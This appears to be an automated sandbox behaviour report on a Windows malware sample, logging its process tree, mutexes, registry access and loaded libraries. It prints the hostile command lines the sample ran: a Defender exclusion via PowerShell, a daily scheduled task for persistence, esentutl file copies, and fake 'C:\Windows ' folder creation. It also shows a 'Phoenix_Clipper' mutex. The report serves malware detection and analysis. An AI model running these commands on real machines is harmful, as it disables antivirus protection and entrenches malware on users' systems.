Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 13_2_004019F0
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Code function: 0_2_02D06DC8 CoCreateInstance, 0_2_02D06DC8
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear, 13_2_004019F0
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Code function: 13_2_006ECBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW, 13_2_006ECBD0
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe File created: C:\Users\Public\Libraries\PNO Jump to behavior
Source: C:\Users\Public\Libraries\aymtmquJ.pif Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-605af54964cdb3b4-inf
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7256:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Mutant created: NULL
Source: C:\Windows\System32\alg.exe Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-605af54964cdb3b49ea72c54-b
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe Mutant created: \Sessions\1\BaseNamedObjects\Phoenix_Clipper_666
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-605af54964cdb3b4cd68e75b-b
Source: C:\Users\Public\Libraries\aymtmquJ.pif File created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe Command line argument: 08A 13_2_00413780
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales Jump to behavior
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\Public\Libraries\aymtmquJ.pif File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C6dAUcOA6M.exe ReversingLabs: Detection: 63%
Source: C6dAUcOA6M.exe Virustotal: Detection: 62%
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe File read: C:\Users\user\Desktop\C6dAUcOA6M.exe Jump to behavior
Source: C:\Users\Public\Libraries\aymtmquJ.pif Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Users\user\Desktop\C6dAUcOA6M.exe "C:\Users\user\Desktop\C6dAUcOA6M.exe"
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\C6dAUcOA6M.exe /d C:\\Users\\Public\\Libraries\\Juqmtmya.PIF /o
Source: C:\Windows\SysWOW64\esentutl.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Process created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Users\Public\alpha.pif Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: unknown Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 02:17 /du 23:59 /sc daily /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknown Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
Source: unknown Process created: C:\Users\Public\Libraries\Juqmtmya.PIF "C:\Users\Public\Libraries\Juqmtmya.PIF"
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Process created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
Source: unknown Process created: C:\Users\Public\Libraries\Juqmtmya.PIF "C:\Users\Public\Libraries\Juqmtmya.PIF"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Process created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Source: unknown Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" " Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\C6dAUcOA6M.exe /d C:\\Users\\Public\\Libraries\\Juqmtmya.PIF /o Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Process created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" Jump to behavior
Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe" Jump to behavior
Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 02:17 /du 23:59 /sc daily /ri 1 /f
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe Process created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
Source: C:\Users\Public\alpha.pif Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Process created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Source: C:\Users\Public\Libraries\Juqmtmya.PIF Process created: C:\Users\Public\Libraries\aymtmquJ.pif C:\Users\Public\Libraries\aymtmquJ.pif
Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Native_neworigin.exe "C:\Users\user\AppData\Local\Temp\Native_neworigin.exe"
Source: C:\Users\Public\Libraries\aymtmquJ.pif Process created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: url.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ???????.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
Source: C:\Users\user\Desktop\C6dAUcOA6M.exe Section loaded: ??.dll Jump to behavior
